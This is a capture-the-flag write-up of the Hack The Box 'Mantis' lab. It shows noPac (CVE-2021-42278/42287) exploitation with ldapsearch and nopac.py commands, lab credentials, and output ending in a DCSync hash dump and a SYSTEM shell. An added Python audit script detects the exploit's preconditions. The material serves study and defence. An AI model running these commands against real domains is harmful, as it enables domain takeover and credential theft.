CVE-2021-42278 + CVE-2021-42287 (noPac)


The scan result confirmed that the target system is vulnerable to the noPac exploit. The CVE-2021-42278 + CVE-2021-42287 chain (noPac) works by impersonating a domain controller: a computer account is created and the trailing $ sign is stripped from its sAMAccountName so that the name matches the domain controller's account name.

By default, a standard user who is part of an Active Directory domain has the SeMachineAccountPrivilege policy enabled and can add up to 10 devices to the domain.

┌──(kali㉿kali)-[~/archive/htb/labs/mantis]
└─$ ldapsearch -x -h ldap://htb.local:389 -D james@htb.local -w 'J@m3s_P@ssW0rd!' -b 'DC=HTB,DC=LOCAL' -LLL | grep -i ms-DS-MachineAccountQuota
ms-ds-machineaccountquota: 10

The ms-DS-MachineAccountQuota LDAP attribute defines how many devices the user can add. In this case, it's the default of 10.

ms-DS-MachineAccountQuota can be checked in many different ways.
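A defender-side audit for the two preconditions described above (a non-zero ms-DS-MachineAccountQuota and a computer object whose sAMAccountName has been renamed to a domain controller's name without the trailing $). This is an added example for this writeup, not part of nopac.py or the lab; it runs on constructed, simplified LDAP-style computer objects so it works offline, and the helper names, sample DNs and the DC list are assumptions.

```python
# Added example: audit computer objects for noPac preconditions and indicators.
# Records are constructed and simplified; in practice they would come from an
# LDAP search of the Computers container and the Domain Controllers OU.

SAMPLE_COMPUTERS = [  # constructed sample, modelled on the rename nopac.py reports
    {"dn": "CN=WS01,CN=Computers,DC=htb,DC=local", "sAMAccountName": "WS01$"},
    {"dn": "CN=WIN-RIQPBJWSTNI,CN=Computers,DC=htb,DC=local", "sAMAccountName": "mantis"},
    {"dn": "CN=LAPTOP07,CN=Computers,DC=htb,DC=local", "sAMAccountName": "LAPTOP07$"},
]
DC_ACCOUNTS = ["MANTIS$"]  # assumed sAMAccountNames of the domain controllers


def audit_quota(quota: int) -> list[str]:
    """ms-DS-MachineAccountQuota > 0 lets any domain user create the computer
    account noPac starts from; the common hardening is to set it to 0."""
    if quota > 0:
        return [f"ms-DS-MachineAccountQuota is {quota}; set it to 0 and grant "
                "machine-join rights to a dedicated group instead"]
    return []


def audit_computers(computers, dc_accounts) -> list[tuple[str, str]]:
    """Return (dn, reason) pairs for computer objects that look like a noPac
    rename: missing trailing '$', a name colliding with a DC, or a
    sAMAccountName that no longer matches the object's CN."""
    dc_hosts = {a.rstrip("$").lower() for a in dc_accounts}
    dc_set = {a.lower() for a in dc_accounts}
    findings = []
    for obj in computers:
        sam = obj["sAMAccountName"]
        host = sam.rstrip("$").lower()
        cn = obj["dn"].split(",", 1)[0].removeprefix("CN=").lower()
        if not sam.endswith("$"):
            findings.append((obj["dn"], "sAMAccountName lacks trailing $"))
        if host in dc_hosts and sam.lower() not in dc_set:
            findings.append((obj["dn"], "sAMAccountName collides with DC name " + host))
        if host != cn:  # weaker signal on its own, strong together with the above
            findings.append((obj["dn"], "sAMAccountName does not match CN"))
    return findings


if __name__ == "__main__":
    for line in audit_quota(10):
        print(line)
    for dn, reason in audit_computers(SAMPLE_COMPUTERS, DC_ACCOUNTS):
        print(f"{reason}: {dn}")
```

The rename is only present while the attack is in flight (nopac.py restores the original sAMAccountName afterwards), so the same checks should be applied to Windows Security event 4742 (computer account changed) records rather than only to a point-in-time LDAP snapshot.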

┌──(kali㉿kali)-[~/…/htb/labs/mantis/noPac]
└─$ python3 nopac.py 'htb.local/james:' --impersonate administrator -dc-ip $IP -use-ldap -dump -just-dc             
 
███    ██  ██████  ██████   █████   ██████ 
████   ██ ██    ██ ██   ██ ██   ██ ██      
██ ██  ██ ██    ██ ██████  ███████ ██      
██  ██ ██ ██    ██ ██      ██   ██ ██      
██   ████  ██████  ██      ██   ██  ██████ 
    
password: J@m3s_P@ssW0rd!
[*] Current ms-DS-MachineAccountQuota = 10
[*] Selected Target mantis.htb.local
[*] will try to impersonate administrator
[*] Adding Computer Account "WIN-RIQPBJWSTNI$"
[*] MachineAccount "WIN-RIQPBJWSTNI$" password = @uYgK2vSgNfL
[*] Successfully added machine account WIN-RIQPBJWSTNI$ with password @uYgK2vSgNfL.
[*] WIN-RIQPBJWSTNI$ object = CN=WIN-RIQPBJWSTNI,CN=Computers,DC=htb,DC=local
[*] WIN-RIQPBJWSTNI$ sAMAccountName == mantis
[*] Saving a DC's ticket in mantis.ccache
[*] Reseting the machine account to WIN-RIQPBJWSTNI$
[*] Restored WIN-RIQPBJWSTNI$ sAMAccountName to original value
[*] Using TGT from cache
[*] Impersonating administrator
[*] 	Requesting S4U2self
[*] Saving a user's ticket in administrator.ccache
[*] Rename ccache to administrator_mantis.htb.local.ccache
[*] attempting to del a computer with the name: WIN-RIQPBJWSTNI$
[-] Delete computer WIN-RIQPBJWSTNI$ Failed! Maybe the current user does not have permission.
[*] Pls make sure your choice hostname and the -dc-ip are same machine !!
[*] Exploiting..
[*] dumping domain credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
[*] Kerberos keys grabbed
[*] Cleaning up... 

The noPac exploit completed and led to DCSync, dumping the domain credential hashes: a domain-level compromise.

┌──(kali㉿kali)-[~/…/htb/labs/mantis/noPac]
└─$ python3 nopac.py 'htb.local/james:' --impersonate administrator -dc-ip $IP -use-ldap -shell
 
███    ██  ██████  ██████   █████   ██████ 
████   ██ ██    ██ ██   ██ ██   ██ ██      
██ ██  ██ ██    ██ ██████  ███████ ██      
██  ██ ██ ██    ██ ██      ██   ██ ██      
██   ████  ██████  ██      ██   ██  ██████ 
 
password: J@m3s_P@ssW0rd!
[*] Current ms-DS-MachineAccountQuota = 10
[*] Selected Target mantis.htb.local
[*] will try to impersonate administrator
[*] Already have user administrator ticket for target mantis.htb.local
[*] Pls make sure your choice hostname and the -dc-ip are same machine !!
[*] Exploiting..
[!] Launching semi-interactive shell - Careful what you execute
c:\Windows\system32> whoami
 nt authority\system
 
c:\Windows\system32> hostname
mantis
 
c:\Windows\system32> ipconfig
 
Windows IP Configuration
 
 
ethernet adapter local area connection:
 
   connection-specific dns suffix  . : 
   ipv6 address. . . . . . . . . . . : dead:beef::84ef:aacc:c716:5b9a
   link-local ipv6 address . . . . . : fe80::84ef:aacc:c716:5b9a%11
   ipv4 address. . . . . . . . . . . : 10.10.10.52
   subnet mask . . . . . . . . . . . : 255.255.255.0
   default gateway . . . . . . . . . : fe80::250:56ff:feb9:6c92%11
                                       10.10.10.2
 
tunnel adapter isatap.{f163287b-37d4-42ac-8358-59bd4fbfbe46}:
 
   media state . . . . . . . . . . . : Media disconnected
   connection-specific dns suffix  . : 

GG